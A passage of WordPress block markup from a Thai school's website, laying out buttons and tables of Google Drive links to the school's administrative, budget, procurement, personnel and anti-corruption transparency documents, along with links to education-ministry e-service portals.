{\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 